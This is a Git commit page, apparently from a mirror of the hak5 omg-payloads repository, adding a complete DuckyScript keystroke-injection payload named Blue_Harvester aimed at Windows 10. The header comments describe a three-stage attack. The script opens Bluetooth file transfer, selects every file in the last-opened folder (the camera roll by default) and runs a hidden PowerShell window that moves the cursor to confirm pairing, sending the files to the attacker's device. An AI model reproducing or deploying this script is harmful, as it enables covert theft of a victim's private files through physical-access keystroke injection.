hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create payload.txt

pull/58/head
LulzAnarchyAnon 2022-05-29 09:28:32 -07:00 committed by GitHub
parent 8f94fa2422
commit 324636626b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 133 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

133
payloads/library/execution/Blue_Harvester/payload.txt Normal file
View File

@ -0,0 +1,133 @@
REM Title: Blue_Harvester
REM Author: LulzAnarchyAnon
REM READ BELOW BEFORE EXECUTING PAYLOAD...
REM Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
REM Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened
REM is selected followed by all of the files in the folder being selected, and added to the transfer cue.
REM The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
REM Afterwards the selected files are transfered to the attackers device via bluetooth.
REM I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
REM Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
REM At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
REM NOTE: Make sure your device is Discoverable...
REM The cursor coordinates x,y on the screen may vary depending on device...
REM A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
REM I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or
REM USB Rubber Ducky (YOUR CHOICE)
REM Target: Windows 10
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM STAGE 1
GUI
DELAY 50
STRING fsquirt
DELAY 200
ENTER
DELAY 500
SPACE
DELAY 500
REM STAGE 2
k
DELAY 500
ENTER
DELAY 500
SPACE
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
CTRL a
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
ENTER
REM STAGE 3
GUI
DELAY 50
STRING powershell -windowstyle hidden
DELAY 1000
ENTER
DELAY 5000
STRING Add-Type -AssemblyName System.Windows.Forms
DELAY 2000
ENTER
STRING $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
DELAY 2000
ENTER
STRING $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 2000
ENTER
DELAY 2000
STRING [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
DELAY 2000
ENTER
DELAY 500
MOUSE CLICK 1
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
ALT SPACE
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
ENTER